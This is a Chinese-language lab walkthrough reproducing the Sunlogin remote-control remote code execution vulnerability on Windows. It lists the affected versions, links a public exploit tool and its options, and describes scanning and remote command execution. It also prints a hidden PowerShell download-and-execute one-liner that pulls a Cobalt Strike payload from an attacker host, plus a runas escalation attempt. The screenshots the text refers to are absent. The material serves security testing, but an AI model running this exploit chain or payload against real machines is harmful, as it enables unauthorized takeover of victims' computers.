目录
漏洞描述:
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
影响版本:
向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
工具复现:
同一局域网:
攻击机:172.52.3.214
客户机PC:192.168.29.152
工具下载:向日葵漏洞工具https://github.com/Mr-xn/sunlogin_rce/releases/tag/new
-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令
客户机PC:
攻击机PC:
使用工具进行扫描:(向日葵端口在40000-60000之间,所以可以直接指定端口)
命令执行:
CS服务器上线:(失败)
CS服务器中选择攻击-Web钓鱼-Web投递——设置端口、监听器
Payload生成:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.29.130:444/a'))"
进入客户端cmd输入即可上线
测试时发现,通过向日葵漏洞无法通过远程cmd执行上线(可能权限不够)
进行提权:切换administrator用户:
runas /noprofile /user:Administrator cmd
还是不行,可能因为”符号被windows内部重复处理了
客户机直接cmd测试:
CS成功上线: